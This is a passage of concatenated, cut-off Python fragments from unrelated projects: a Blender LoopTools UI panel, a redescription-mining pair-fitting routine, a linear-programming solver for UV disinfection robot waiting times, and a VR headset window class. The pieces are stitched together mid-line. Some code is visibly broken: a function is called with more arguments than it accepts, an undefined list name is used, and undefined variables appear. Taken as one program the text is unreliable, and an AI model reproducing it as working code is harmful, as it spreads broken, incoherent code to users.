split.prop(lt, "display_circle", text="", icon='RIGHTARROW')
split.operator("mesh.looptools_circle")
# circle - settings
if lt.display_circle:
box = col.column(align=True).box().column()
box.prop(lt, "circle_fit")
box.separator()
box.prop(lt, "circle_flatten")
row = box.row(align=True)
row.prop(lt, "circle_custom_radius")
row_right = row.row(align=True)
row_right.active = lt.circle_custom_radius
row_right.prop(lt, "circle_radius", text="")
box.prop(lt, "circle_regular")
box.separator()
box.prop(lt, "circle_influence")
# curve - first line
split = col.split(percentage=0.15)
if lt.display_curve:
split.prop(lt, "display_curve", text="", icon='DOWNARROW_HLT')
else:
split.prop(lt, "display_curve", text="", icon='RIGHTARROW')
split.operator("mesh.looptools_curve")
# curve - settings
if lt.display_curve:
box = col.column(align=True).box().column()
box.prop(lt, "curve_interpolation")
box.prop(lt, "curve_restriction")
box.prop(lt, "curve_boundaries")
box.prop(lt, "curve_regular")
box.separator()
box.prop(lt, "curve_influence")
# flatten - first line
split = col.split(percentage=0.15)
if lt.display_flatten:
split.prop(lt, "display_flatten", text="", icon='DOWNARROW_HLT')
else:
split.prop(lt, "display_flatten", text="", icon='RIGHTARROW')
split.operator("mesh.looptools_flatten")
# flatten - settings
if lt.display_flatten:
box = col.column(align=True).box().column()
box.prop(lt, "flatten_plane")
#box.prop(lt, "flatten_restriction")
box.separator()
box.prop(lt, "flatten_influence")
# loft - first line
split = col.split(percentage=0.15)
if lt.display_loft:
split.prop(lt, "display_loft", text="", icon='DOWNARROW_HLT')
else:
split.prop(lt, "display_loft", text="", icon='RIGHTARROW')
split.operator("mesh.looptools_bridge", text="Loft").loft = True
# loft - settings
if lt.display_loft:
box = col.column(align=True).box().column()
#box.prop(self, "mode")
# top row
col_top = box.column(align=True)
row = col_top.row(align=True)
col_left = row.column(align=True)
col_right = row.column(align=True)
col_right.active = lt.bridge_segments != 1
col_left.prop(lt, "bridge_segments")
col_right.prop(lt, "bridge_min_width", text="")
# bottom row
bottom_left = col_left.row()
bottom_left.active = lt.bridge_segments != 1
bottom_left.prop(lt, "bridge_interpolation", text="")
bottom_right = col_right.row()
bottom_right.active = lt.bridge_interpolation == 'cubic'
bottom_right.prop(lt, "bridge_cubic_strength")
# boolean properties
col_top.prop(lt, "bridge_remove_faces")
col_top.prop(lt, "bridge_loft_loop")
# override properties
col_top.separator()
row = box.row(align = True)
row.prop(lt, "bridge_twist")
row.prop(lt, "bridge_reverse")
# relax - first line
split = col.split(percentage=0.15)
if lt.display_relax:
split.prop(lt, "display_relax", text="", icon='DOWNARROW_HLT')
else:
split.prop(lt, "display_relax", text="", icon='RIGHTARROW')
split.operator("mesh.looptools_relax")
# relax - settings
if lt.display_relax:
box = col.column(align=True).box().column()
box.prop(lt, "relax_interpolation")
box.prop(lt, "relax_input")
box.prop(lt, "relax_iterations")
box.prop(lt, "relax_regular")
# space - first line
split = col.split(percentage=0.15)
if lt.display_space:
split.prop(lt, "display_space", text="", icon='DOWNARROW_HLT')
else:
split.prop(lt, "display_space", text="", icon='RIGHTARROW')
split.operator("mesh.looptools_space")
# space - settings
if lt.display_space:
box = col.column(align=True).box().column()
box.prop(lt, "space_interpolation")
box.prop(lt, "space_input")
box.separator()
box.prop(lt, "space_influence")
# property group containing all properties for the gui in the panel
class LoopToolsProps(bpy.types.PropertyGroup):
"""
Fake module like class
bpy.context.window_manager.looptools
"""
# general display properties
display_bridge = bpy.props.BoolProperty(name = "Bridge settings",
description = "Display settings of the Bridge tool",
default = False)
display_circle = bpy.props.BoolProperty(name = "Circle settings",
description = "Display settings of the Circle tool",
default = False)
display_curve = bpy.props.BoolProperty(name = "Curve settings",
description = "Display settings of the Curve tool",
default = False)
display_flatten = bpy.props.BoolProperty(name = "Flatten settings",
description = "Display settings of the Flatten tool",
default = False)
display_loft = bpy.props.BoolProperty(name = "Loft settings",
description = "Display settings of the Loft tool",
default = False)
display_relax = bpy.props.BoolProperty(name = "Relax settings",
description = "Display settings of the Relax tool",
default = False)
display_space = bpy.props.BoolProperty(name = "Space settings",
description = "Display settings of the Space tool",
default = False)
# bridge properties
bridge_cubic_strength = bpy.props.FloatProperty(name = "Strength",
description = "Higher strength results in more fluid curves",
default = 1.0,
soft_min = -3.0,
soft_max = 3.0)
bridge_interpolation = bpy.props.EnumProperty(name = "Interpolation mode",
items = (('cubic', "Cubic", "Gives curved results"),
('linear', "Linear", "Basic, fast, straight interpolation")),
description = "Interpolation mode: algorithm used when creating "\
"segments",
default = 'cubic')
bridge_loft = bpy.props.BoolProperty(name = "Loft",
description = "Loft multiple loops, instead of considering them as "\
"a multi-input for bridging",
default = False)
bridge_loft_loop = bpy.props.BoolProperty(name = "Loop",
description = "Connect the first and the last loop with each other",
default = False)
bridge_min_width = bpy.props.IntProperty(name = "Minimum width",
description = "Segments with an edge smaller than this are merged "\
"(compared to base edge)",
default = 0,
min = 0,
max = 100,
subtype = 'PERCENTAGE')
bridge_mode = bpy.props.EnumProperty(name = "Mode",
items = (('basic', "Basic", "Fast algorithm"),
('shortest', "Shortest edge", "Slower algorithm | |
= col.getLiteralSeg(False, segments[op], best[-1][-1])
if best[-1][-1] is not None:
cands.append(Extension(self.constraints.getSSetts(), best))
return cands
################################################################### PAIRS METHODS
###################################################################
def computePair(self, colL, colR):
min_type = min(colL.typeId(), colR.typeId())
max_type = max(colL.typeId(), colR.typeId())
method_string = 'self.do%i%i' % (min_type, max_type)
try:
method_compute = eval(method_string)
except AttributeError:
raise Exception('Oups this combination does not exist (%i %i)!' % (min_type, max_type))
if colL.typeId() == min_type:
(scores, literalsL, literalsR) = method_compute(colL, colR, 1)
else:
(scores, literalsR, literalsL) = method_compute(colL, colR, 0)
return (scores, literalsL, literalsR)
def doBoolStar(self, colL, colR, side):
if side == 1:
(supports, fixTerm, extCol) = (SParts(self.constraints.getSSetts(), colL.nbRows(), [colL.supp(), set()]), BoolTerm(colL.getId()), colR)
else:
(supports, fixTerm, extCol) = (SParts(self.constraints.getSSetts(), colL.nbRows(), [set(), colR.supp()]), BoolTerm(colR.getId()), colL)
return self.fit(extCol, supports, side, fixTerm)
def fit(self, col, supports, side, termX):
(scores, literalsFix, literalsExt) = ([], [], [])
lparts = supports.lparts()
cands = self.findCover(side, col, lparts, supports, init=1)
for cand in cands:
scores.append(cand[1].getAcc())
literalsFix.append(Literal(cand[0], termX))
literalsExt.append(cand[1].getLiteral())
return (scores, literalsFix, literalsExt)
def do11(self, colL, colR, side):
return self.doBoolStar(colL, colR, side)
def do12(self, colL, colR, side):
return self.doBoolStar(colL, colR, side)
def do13(self, colL, colR, side):
return self.doBoolStar(colL, colR, side)
def do22(self, colL, colR, side):
return self.subdo22Full(colL, colR, side)
def do23(self, colL, colR, side):
return self.subdo23Full(colL, colR, side)
def do33(self, colL, colR, side):
# if len(init_info[1-side]) == 3: # fit FULL
# if len(init_info[1-side][0]) > len(init_info[side][0]):
# (scores, literalsB, literalsA)= self.subdo33Full(colL, colR, side)
# return (scores, literalsA, literalsB)
# else:
# return self.subdo33Full(colL, colR, side)
# else:
# return self.subdo33Heur(colL, colR, side)
if len(colL.interNonMode(colR.nonModeSupp())) >= self.constraints.getCstr("min_itm_in") :
return self.subdo33Full(colL, colR, side)
else:
return ([], [], [])
def subdo33Heur(self, colL, colR, side):
### Suitable for sparse data
bestScore = None
if True: ### DOABLE
## FIT LHS then RHS
supports = SParts(self.constraints.getSSetts(), colL.nbRows(), [set(), colR.nonModeSupp()])
(scoresL, literalsFixL, literalsExtL) = self.fit(colL, supports, 0, idR)
for tL in literalsExtL:
suppL = colL.suppLiteral(tL)
supports = SParts(self.constraints.getSSetts(), colL.nbRows(), [suppL, set()])
(scoresR, literalsFixR, literalsExtR) = self.fit(colR, supports, 1, tL)
for i in range(len(scoresR)):
if scoresR[i] > bestScore:
(scores, literalsL, literalsR) = ([scoresR[i]], [literalsFixR[i]], [literalsExtR[i]])
bestScore = scoresR[i]
## FIT RHS then LHS
supports = SParts(self.constraints.getSSetts(), colL.nbRows(), [colL.nonModeSupp(), set()])
(scoresR, literalsFixR, literalsExtR) = self.fit(colR, supports, 1, idL)
for tR in literalsExtR:
suppR = colR.suppLiteral(tR)
supports = SParts(self.constraints.getSSetts(), colL.nbRows(), [set(), suppR])
(scoresL, literalsFixL, literalsExtL) = self.fit(colL, supports, 0, tR)
for i in range(len(scoresL)):
if scoresL[i] > bestScore:
(scores, literalsL, literalsR) = ([scoresR[i]], [literalsExtL[i]], [literalsFixL[i]])
bestScore = scoresL[i]
# if len(scores) > 0:
# print "%f: %s <-> %s" % (scores[0], literalsA[0], literalsB[0])
return (scores, literalsL, literalsR)
def subdo33Full(self, colL, colR, side):
## print "SUBDO 33 FULL", colL.getId(), colR.getId()
best = []
bUpE=1
bUpF=1
interMat = []
bucketsL = colL.buckets()
bucketsR = colR.buckets()
if len(bucketsL[0]) > len(bucketsR[0]):
bucketsF = bucketsR; colF = colR; bucketsE = bucketsL; colE = colL; side = 1-side; flip_side = True
else:
bucketsF = bucketsL; colF = colL; bucketsE = bucketsR; colE = colR; flip_side = False
(scores, literalsF, literalsE) = ([], [], [])
## DOABLE
# print "Nb buckets: %i x %i"% (len(bucketsF[1]), len(bucketsE[1]))
# if ( len(bucketsF[1]) * len(bucketsE[1]) > self.constraints.getCstr("max_prodbuckets") ):
nbb = self.constraints.getCstr("max_prodbuckets") / float(len(bucketsF[1]))
if len(bucketsE[1]) > nbb: ## self.constraints.getCstr("max_sidebuckets"):
if len(bucketsE[1])/nbb < self.constraints.getCstr("max_agg"):
### collapsing buckets on the largest side is enough to get within the reasonable size
bucketsE = colE.collapsedBuckets(self.constraints.getCstr("max_agg"), nbb)
bUpE=3 ## in case of collapsed bucket the threshold is different
else:
### collapsing buckets on the largest side is NOT enough to get within the reasonable size
bucketsE = None
#### try cats
bbs = [dict([(bi, es) for (bi, es) in enumerate(bucketsL[0]) \
if ( len(es) > self.constraints.getCstr("min_itm_in") and \
colL.nbRows() - len(es) > self.constraints.getCstr("min_itm_out"))]),
dict([(bi, es) for (bi, es) in enumerate(bucketsR[0]) \
if ( len(es) > self.constraints.getCstr("min_itm_in") and \
colR.nbRows() - len(es) > self.constraints.getCstr("min_itm_out"))])]
## if len(bbs[0]) > 0 and ( len(bbs[1]) == 0 or len(bbs[0])/float(len(bucketsL[0])) < len(bbs[1])/float(len(bucketsR[0]))):
nbes = [float(max(sum([len(v) for (k,v) in bbs[s].items()]), .5)) for s in [0,1]]
side = None
if len(bbs[0]) > 0 and ( len(bbs[1]) == 0 or nbes[0]/len(bbs[0]) > nbes[1]/len(bbs[1]) ):
ccL, ccR, side = (CatColM(bbs[0], colL.nbRows(), colL.miss()), colR, 1)
elif len(bbs[1]) > 0:
ccL, ccR, side = (colL, CatColM(bbs[1], colR.nbRows(), colR.miss()), 0)
if side is not None:
#### working with on variable as categories is workable
## print "Trying cats...", len(bucketsL[0]), len(bucketsR[0]), len(bbs[0]), len(bbs[1])
(scores, literalsFix, literalsExt) = self.subdo23Full(ccL, ccR, side)
if side == 1:
literalsL = []
literalsR = literalsExt
for ltc in literalsFix:
val = bucketsL[1][ltc.getTerm().getCat()]
literalsL.append( Literal(ltc.isNeg(), NumTerm(colL.getId(), val, val)) )
else:
literalsL = literalsExt
literalsR = []
for ltc in literalsFix:
val = bucketsR[1][ltc.getTerm().getCat()]
literalsR.append( Literal(ltc.isNeg(), NumTerm(colR.getId(), val, val)) )
return (scores, literalsL, literalsR)
else:
#### working with on variable as categories is NOT workable
### the only remaining solution is aggressive collapse of buckets on both sides
nbb = numpy.sqrt(self.constraints.getCstr("max_prodbuckets"))
bucketsE = colE.collapsedBuckets(self.constraints.getCstr("max_agg"), nbb)
bUpE=3 ## in case of collapsed bucket the threshold is different
bucketsF = colF.collapsedBuckets(self.constraints.getCstr("max_agg"), nbb)
bUpF=3 ## in case of collapsed bucket the threshold is different
## print "Last resort solution...", nbb, len(bucketsL[0]), len(bucketsR[0])
## print "buckets lengths\t(0,%d) %d\t(1,%d) %d\tcollapsed %d -- product %d" % (colL.id, len(bucketsL[1]), colR.id, len(bucketsR[1]), len(bucketsE[1]), len(bucketsF[1]) * len(bucketsE[1]))
if bucketsE is not None and ( len(bucketsF[1]) * len(bucketsE[1]) < self.constraints.getCstr("max_prodbuckets") ):
## print "Trying buckets...", len(bucketsF[0]), len(bucketsE[0])
totInt = colE.nbRows()
#margE = [len(intE) for intE in bucketsE[0]]
margF = [len(bucketsF[0][i]) for i in range(len(bucketsF[0]))]
for bukF in bucketsF[0]:
interMat.append([len(bukF & bukE) for bukE in bucketsE[0]])
if bucketsF[2] is not None :
margF[bucketsF[2]] += colF.lenMode()
for bukEId in range(len(bucketsE[0])):
interMat[bucketsF[2]][bukEId] += len(colF.interMode(bucketsE[0][bukEId]))
if bucketsE[2] is not None :
#margE[bucketsE[2]] += colE.lenMode()
for bukFId in range(len(bucketsF[0])):
interMat[bukFId][bucketsE[2]] += len(colE.interMode(bucketsF[0][bukFId]))
if bucketsF[2] is not None and bucketsE[2] is not None:
interMat[bucketsF[2]][bucketsE[2]] += len(colE.interMode(colF.modeSupp()))
# ### check marginals
# totF = 0
# for iF in range(len(bucketsF[0])):
# sF = sum(interMat[iF])
# if sF != margF[iF]:
# raise Error('Error in computing the marginals (1)')
# totF += sF
# totE = 0
# for iE in range(len(bucketsE[0])):
# sE = sum([intF[iE] for intF in interMat])
# if sE != margE[iE]:
# raise Error('Error in computing the marginals (2)')
# totE += sE
# if totE != totF or totE != colE.nbRows():
# raise Error('Error in computing the marginals (3)')
belowF = 0
lowF = 0
while lowF < len(interMat) and totInt - belowF >= self.constraints.getCstr("min_itm_in"):
aboveF = 0
upF = len(interMat)-1
while upF >= lowF and totInt - belowF - aboveF >= self.constraints.getCstr("min_itm_in"):
if belowF + aboveF >= self.constraints.getCstr("min_itm_out"):
EinF = [sum([interMat[iF][iE] for iF in range(lowF,upF+1)]) for iE in range(len(interMat[lowF]))]
EoutF = [sum([interMat[iF][iE] for iF in range(0,lowF)+range(upF+1,len(interMat))]) for iE in range(len(interMat[lowF]))]
#totEinF = sum(EinF)
fixed_colors = [[0, 0],[totInt - aboveF - belowF, aboveF + belowF]]
belowEF = 0
outBelowEF = 0
lowE = 0
while lowE < len(interMat[lowF]) and totInt - belowF - aboveF - belowEF >= self.constraints.getCstr("min_itm_in"):
aboveEF = 0
outAboveEF = 0
upE = len(interMat[lowF])-1
while upE >= lowE and totInt - belowF - aboveF - belowEF - aboveEF >= self.constraints.getCstr("min_itm_in"):
var_colors = [totInt - belowF - aboveF - belowEF - aboveEF, belowF + aboveF - outAboveEF - outBelowEF]
best = self.updateACTColorsP33(best, (lowF, upF, lowE, upE), side, True, False, fixed_colors, var_colors)
aboveEF+=EinF[upE]
outAboveEF+=EoutF[upE]
upE-=1
belowEF+=EinF[lowE]
outBelowEF+=EoutF[lowE]
lowE+=1
aboveF+=margF[upF]
upF-=1
belowF+=margF[lowF]
lowF+=1
for b in best:
tF = colF.getLiteralBuk(False, bucketsF[1], b[-1][-1][0:2], bucketsF[bUpF])
tE = colE.getLiteralBuk(False, bucketsE[1], b[-1][-1][2:], bucketsE[bUpE])
if tF is not None and tE is not None:
literalsF.append(tF)
literalsE.append(tE)
scores.append(b[0][0])
if flip_side:
return (scores, literalsE, literalsF)
else:
return (scores, literalsF, literalsE)
def subdo22Full(self, colL, colR, side):
##### THIS NEEDS CHANGE PARTS
configs = [(0, False, False), (1, False, True), (2, True, False), (3, True, True)]
if True not in self.constraints.getCstr("neg_query", side=side, type_id=2):
configs = configs[:1]
best = [[] for c in configs]
tot = colL.nbRows()
for catL in colL.cats():
totL = len(colL.suppCat(catL))
lparts = [0, totL, 0, colL.nbRows()-totL]
for catR in colR.cats():
totR = len(colR.suppCat(catR))
interLR = len(colL.suppCat(catL) & colR.suppCat(catR))
lin = [0, interLR, 0, totR - | |
<filename>final_pipeline/lp_solver.py
import cvxpy as cp
import numpy as np
import geopandas as gpd
import matplotlib.pyplot as plt
from matplotlib.collections import LineCollection
import matplotlib.cm as cm
from shapely.geometry import box, Point, LineString, Polygon, MultiPolygon
import shapely.geometry
from shapely.affinity import scale
from shapely.prepared import prep
from scipy.spatial import distance_matrix
from matplotlib.animation import FuncAnimation
from numpy.linalg import norm
from sys import exit
from shapely.ops import transform, unary_union
# Try to load skgeom package (for naive solution)
SKGEOM_AVAIL = False
try:
from skgeom import *
SKGEOM_AVAIL = True
except ImportError as e:
pass
from branch_and_bound import branch_bound_poly
EPS = 1e-5 # Arbitrary small number to avoid rounding error
def solve_full_lp(room,
robot_height,
robot_radius,
robot_power,
use_weak_everything,
use_strong_visibility,
use_strong_distances,
scaling_method,
min_intensity,
show_visualization,
use_shadow):
intensity_tuple = get_intensities(room,
robot_height,
robot_radius,
robot_power,
use_weak_everything,
use_strong_visibility,
use_strong_distances,
show_visualization,
use_shadow)
room_intensities, unguarded_room_idx = intensity_tuple
loc_times = cp.Variable(room.guard_grid.shape[0])
obj = cp.Minimize(cp.sum(loc_times))
constraints = [
room_intensities.T @ loc_times >= min_intensity,
loc_times >= 0
]
prob = cp.Problem(obj, constraints=constraints)
prob.solve(solver='ECOS')
# Report if problem is infeasible
if prob.status == 'infeasible':
exit('ERROR: Problem is infeasible')
disinfected_region, percent_disinfected = calculate_percent_disinfected(
room,
unguarded_room_idx,
loc_times.value,
unguarded_room_idx,
use_strong_distances,
use_weak_everything)
unscaled_time = loc_times.value.sum()
scale = get_scale(room, min_intensity, disinfected_region, loc_times.value,
scaling_method, robot_power, robot_height, robot_radius, use_shadow)
solution_time = scale * unscaled_time
# TODO: Filter for significant points
return solution_time, loc_times.value, room_intensities.T, unguarded_room_idx, disinfected_region, percent_disinfected
def calculate_percent_disinfected(room, not_visible_room_idx, waiting_times, use_strong_distances, use_weak_everything):
# If we use strong/weak visibility, we guarantee disinfection in discrete
# grid cells (the epsilon-neighborhoods)
if use_strong_distances or use_weak_everything:
visible_cells = [room.full_room_cells[i]
for i in range(room.full_room_cells.shape[0])
if i not in not_visible_room_idx]
disinfected_region = unary_union(visible_cells)
# Otherwise, assume we use branch-and-bound to scale up solution
else:
print("""
Note: When calculating percent disinfected, we assume that
a branch-and-bound method will be used to scale the solution
appropriately.""")
# HARDCODED: Ignore points where we wait less than a millisecond
vis_preprocessing = compute_skgeom_visibility_preprocessing(room.room)
waiting_points = [point for i, point in enumerate(room.guard_grid)
if waiting_times[i] > 1e-3]
all_visibility_polygons = [compute_visibility_polygon(vis_preprocessing,
point) for point in waiting_points]
disinfected_region = shapely.ops.unary_union(all_visibility_polygons).simplify(0.001)
area_disinfected = disinfected_region.area
total_area = room.room.area
percent_disinfected = (area_disinfected/total_area) * 100
print("Percent of room that can be disinfected: {:.2f}%".format(
percent_disinfected))
return disinfected_region, percent_disinfected
def visualize_times(room, waiting_times, unguarded_room_idx):
ax = plt.axes()
ax.axis('equal')
# Plot room (image and polygon)
ax.imshow(room.room_img)
ax.plot(*transform(room.xy_to_pixel, room.room).exterior.xy, 'black')
# Plot guard points
guard_points_x = [room.xy_to_pixel(x, y)[0] for x, y in room.guard_grid]
guard_points_y = [room.xy_to_pixel(x, y)[1] for x, y in room.guard_grid]
ax.scatter(guard_points_x, guard_points_y, s = waiting_times / 10, facecolors = 'none', edgecolors = 'r')
# Plot unguarded regions
unguarded = [room.full_room_cells[i] for i in unguarded_room_idx]
for idx, cell in zip(unguarded_room_idx, unguarded):
if room.full_room_iswall[idx] == 0:
ax.fill(*transform(room.xy_to_pixel, cell).exterior.xy, "darkred", alpha = 0.6)
elif room.full_room_iswall[idx] == 1:
ax.fill(*transform(room.xy_to_pixel, cell).xy, "darkred", alpha = 0.6)
else:
raise Exception("Unable to classify room cell: ", cell)
# Plot unenterable regions
unenterable_indices = []
for i, room_cell in enumerate(room.full_room_cells):
is_visible = False
prep_room_cell = prep(room_cell)
for guard_pt in room.guard_grid:
if prep_room_cell.contains(Point(*guard_pt)):
is_visible = True
break
if not is_visible and i not in unguarded_room_idx:
unenterable.append(i)
for idx in unenterable_indices:
if room.full_room_iswall[idx] == 0:
ax.fill(*transform(room.xy_to_pixel, room.full_room_cells[idx]).exterior.xy, "b", alpha = 0.6)
elif room.full_room_iswall[idx] == 1:
ax.fill(*transform(room.xy_to_pixel, room.full_room_cells[idx]).xy, "b", alpha = 0.6)
else:
raise Exception("Unable to classify room cell: ", room.full_room_cells[idx])
plt.show()
def visualize_energy(room, waiting_times, intensities, threshold):
ax = plt.axes()
ax.axis('equal')
# Plot room (image and polygon)
ax.imshow(room.room_img)
ax.plot(*transform(room.xy_to_pixel, room.room).exterior.xy, 'black')
for i, cell in enumerate(room.full_room_cells):
energy_per_area = intensities[i] @ waiting_times
if energy_per_area == threshold:
print("EXACTLY THRESHOLD: ", room.full_room_grid[i])
color = cm.YlGnBu(1)
elif energy_per_area <= threshold * 1.2:
color = cm.YlGnBu(0.75)
elif energy_per_area <= threshold * 1.5:
color = cm.YlGnBu(0.5)
else:
color = cm.YlGnBu(0.25)
if room.full_room_iswall[i] == 0:
ax.fill(*transform(room.xy_to_pixel, cell).exterior.xy, color = color)
elif room.full_room_iswall[i] == 1:
ax.fill(*transform(room.xy_to_pixel, cell).xy, color = color)
else:
raise Exception("Unable to classify room cell: ", cell)
plt.show()
def visualize_distance(room, waiting_times, intensities):
ax = plt.axes()
ax.axis('equal')
# Plot room (image and polygon)
ax.imshow(room.room_img)
ax.plot(*transform(room.xy_to_pixel, room.room).exterior.xy, 'black')
# Upper bound on maximum distance between any two points
# Used as a heuristic for scaling
max_dist = room.room.centroid.hausdorff_distance(room.room)
for i, cell in enumerate(room.full_room_cells):
disinfection_per_robot_location = np.multiply(intensities[i], waiting_times)
distance_per_robot_location = [norm(room.full_room_grid[i] - robot_loc) for robot_loc in room.guard_grid]
avg_dist = np.average(distance_per_robot_location, weights = disinfection_per_robot_location)
color = cm.YlGnBu(avg_dist/max_dist)
if room.full_room_iswall[i] == 0:
ax.fill(*transform(room.xy_to_pixel, cell).exterior.xy, color = color)
elif room.full_room_iswall[i] == 1:
ax.fill(*transform(room.xy_to_pixel, cell).xy, color = color)
else:
raise Exception("Unable to classify room cell: ", cell)
plt.show()
# Intensity is power transmitted per unit area
def get_intensities(room, robot_height, robot_radius, robot_power, use_weak_everything = False, use_strong_visibility = True, use_strong_distances = True, show_visualization = True, use_shadow = True):
# Construct initial intensities matrix, ignoring visibility
# *Do* account for inverse distance, angle, and robot shadow
num_guard_points = room.guard_grid.shape[0]
num_room_points = room.full_room_grid.shape[0]
room_intensities = np.zeros(shape = (num_guard_points, num_room_points))
for guard_idx, guard_pt in enumerate(room.guard_grid):
if guard_idx % 50 == 0: print("Getting intensity for guard point: {}/{}".format(guard_idx, room.guard_grid.shape[0]))
for room_idx, room_pt in enumerate(room.full_room_grid):
if use_weak_everything:
guard_cell = room.guard_cells[guard_idx]
distance_2d = Point(room_pt).distance(guard_cell)
dist_for_shadow = Point(room_pt).hausdorff_distance(guard_cell)
elif use_strong_distances:
room_cell = room.full_room_cells[room_idx]
distance_2d = Point(guard_pt).hausdorff_distance(room_cell)
dist_for_shadow = Point(guard_pt).distance(room_cell) # Shortest distance: worst case scenario
else:
distance_2d = norm(guard_pt - room_pt)
dist_for_shadow = distance_2d
if room.full_room_iswall[room_idx]:
angle = np.pi/2 if distance_2d == 0 else np.arctan(robot_height/distance_2d)
else:
angle = 0 if distance_2d == 0 else np.pi/2 - np.arctan(robot_height/distance_2d)
# Account for robot shadow
if use_shadow and dist_for_shadow < robot_radius:
room_intensities[guard_idx, room_idx] = 0
else:
# Energy received follows an inverse-square law and Lambert's cosine law
room_intensities[guard_idx, room_idx] = robot_power * np.cos(angle) * 1/(4 * np.pi * (distance_2d**2 + robot_height**2))
# Patch up visibility.
eps_room = prep(room.room.buffer(EPS))
room_vis_preprocessing = compute_skgeom_visibility_preprocessing(room.room.buffer(EPS))
# Precompute visibility polygons
print("Precomputing visibility polygons")
if use_weak_everything:
room_visibility = [None]*room.full_room_grid.shape[0]
for i, room_pt in enumerate(room.full_room_grid):
room_visibility[i] = compute_visibility_polygon(room_vis_preprocessing, room_pt)
elif use_strong_visibility:
guard_visibility = [None]*room.guard_grid.shape[0]
for i, guard_pt in enumerate(room.guard_grid):
guard_visibility[i] = compute_visibility_polygon(room_vis_preprocessing, guard_pt)
print("Finished Precomputing visibility polygons")
broken_sightlines_count = 0
broken_sightlines_list = []
not_visible_room_idx = []
for guard_idx, guard_point in enumerate(room.guard_grid):
if guard_idx % 50 == 0: print("Processing guard index: {}/{}".format(guard_idx, room.guard_grid.shape[0]))
for room_idx, room_point in enumerate(room.full_room_grid):
if use_weak_everything:
# Check that *room* can see at least one point in guard cell
room_point_vis = room_visibility[room_idx]
guard_cell = room.guard_cells[guard_idx]
is_visible = not room_point_vis.intersection(guard_cell).is_empty
elif use_strong_visibility:
# If a point can see all vertices of a simple polygon,
# then it can see the entire polygon
room_cell = room.full_room_cells[room_idx]
if room.full_room_iswall[room_idx] == 0: # Floor cell
room_cell_points = list(room_cell.exterior.coords)
elif room.full_room_iswall[room_idx] == 1: # Wall cell
room_cell_points = list(room_cell.coords)
else:
raise Exception("Unable to classify room cell: ", room_cell)
sightlines = [LineString([pt, guard_point]) for pt in room_cell_points]
is_visible = all([eps_room.contains(line) for line in sightlines])
else:
sight = LineString([guard_point, room_point])
is_visible = eps_room.contains(sight)
if not is_visible:
broken_sightlines_list.append((guard_point, room_point))
broken_sightlines_count += 1
room_intensities[guard_idx, room_idx] = 0
# Ignore unreachable room points (do not guarantee that they are illuminated)
# All intensities are lower than 'robot_power', so we must spend at least
# 'threshold'/'robot_power' time in the solution.
# By assigning all unreachable room points a fake intensity of 'robot_power'
# everywhere, we guarantee that any solution that covers the reachable
# room points will also "cover" the unreachable room points
# In other words, the algorithm will ignore the unreachable room points
not_visible_room_idx = np.argwhere(np.max(room_intensities, axis = 0) == 0).flatten()
room_intensities[:, not_visible_room_idx] = robot_power
if len(not_visible_room_idx) > 0:
print('CAUTION: Not all points in the room can be illuminated')
print(' Red regions will not be disinfected by the robot')
print('(Visualization assume "strong distance" algorithm is used:')
print(' the "branch-and-bound" algorithm will disinfect slightly more.)')
if show_visualization:
plt.imshow(room.room_img)
plt.plot(*transform(room.xy_to_pixel, room.room).exterior.coords.xy, 'black')
for i in not_visible_room_idx:
if room.full_room_iswall[i] == 0:
plt.fill(*transform(room.xy_to_pixel, room.full_room_cells[i]).exterior.coords.xy, 'red')
elif room.full_room_iswall[i] == 1:
plt.fill(*transform(room.xy_to_pixel, room.full_room_cells[i]).coords.xy, 'red')
else:
raise Exception("Unable to classify room cell: ", room.full_room_cells[i])
plt.show()
print('Removed', broken_sightlines_count, 'broken sightlines')
return room_intensities, not_visible_room_idx
# Note: disinfection_region is a shapely object (I *think* either a Polygon
# or Multipolygon) representing the region that we guarantee receives
# at least some illumination
def get_scale(room, min_intensity, disinfected_region, waiting_times, scaling_method,
robot_power, robot_height, robot_radius, use_shadow):
if scaling_method == 'epsilon':
print('ERROR: Epsilon scaling not currently supported. Need to convert epsilon to units of robot height')
return None
scale = (np.sqrt(room.room_eps**2 + 4) + room.room_eps)/(np.sqrt(room.room_eps**2 + 4) - room.room_eps)
| |
clear : boolean
Clear the color, stencil and depth buffer.
"""
# if monoscopic, nop
if self._monoscopic:
warnings.warn("`setBuffer` called in monoscopic mode.", RuntimeWarning)
return
# check if the buffer name is valid
if buffer not in ('left', 'right'):
raise RuntimeError("Invalid buffer name specified.")
# bind the framebuffer, if MSAA is enabled binding the texture is
# deferred until the MSAA buffer is resolved.
if self._samples > 1:
GL.glBindFramebuffer(GL.GL_FRAMEBUFFER, self.frameBufferMsaa)
else:
GL.glBindFramebuffer(GL.GL_FRAMEBUFFER, self.frameBuffer)
GL.glFramebufferTexture2D(
GL.GL_FRAMEBUFFER,
GL.GL_COLOR_ATTACHMENT0,
GL.GL_TEXTURE_2D,
self.frameTexture,
0)
self.buffer = buffer # set buffer string
GL.glEnable(GL.GL_SCISSOR_TEST)
# set the viewport and scissor rect for the buffer
if buffer == 'left':
self.viewport = self.scissor = libovr.getEyeRenderViewport(
libovr.EYE_LEFT)
elif buffer == 'right':
self.viewport = self.scissor = libovr.getEyeRenderViewport(
libovr.EYE_RIGHT)
if clear:
self.setColor(self.color) # clear the texture to the window color
GL.glClearDepth(1.0)
GL.glDepthMask(GL.GL_TRUE)
GL.glClear(
GL.GL_COLOR_BUFFER_BIT |
GL.GL_DEPTH_BUFFER_BIT |
GL.GL_STENCIL_BUFFER_BIT)
# if self.sRGB:
# GL.glDisable(GL.GL_FRAMEBUFFER_SRGB)
if self._samples > 1:
GL.glEnable(GL.GL_MULTISAMPLE)
GL.glDisable(GL.GL_TEXTURE_2D)
GL.glEnable(GL.GL_BLEND)
def getPredictedDisplayTime(self):
"""Get the predicted time the next frame will be displayed on the HMD.
The returned time is referenced to the clock `LibOVR` is using.
Returns
-------
float
Absolute frame mid-point time for the given frame index in seconds.
"""
return libovr.getPredictedDisplayTime(self._frameIndex)
def getTimeInSeconds(self):
"""Absolute time in seconds. The returned time is referenced to the
clock `LibOVR` is using.
Returns
-------
float
Time in seconds.
"""
return libovr.timeInSeconds()
@property
def viewMatrix(self):
"""The view matrix for the current eye buffer. Only valid after a
:py:method:`calcEyePoses` call. Note that setting `viewMatrix` manually
will break visibility culling.
"""
if not self._monoscopic:
if self.buffer == 'left':
return self._viewMatrix[libovr.EYE_LEFT]
elif self.buffer == 'right':
return self._viewMatrix[libovr.EYE_RIGHT]
else:
return self._viewMatrix
@property
def nearClip(self):
"""Distance to the near clipping plane in meters."""
return self._nearClip
@nearClip.setter
def nearClip(self, value):
self._nearClip = value
self._updateProjectionMatrix()
@property
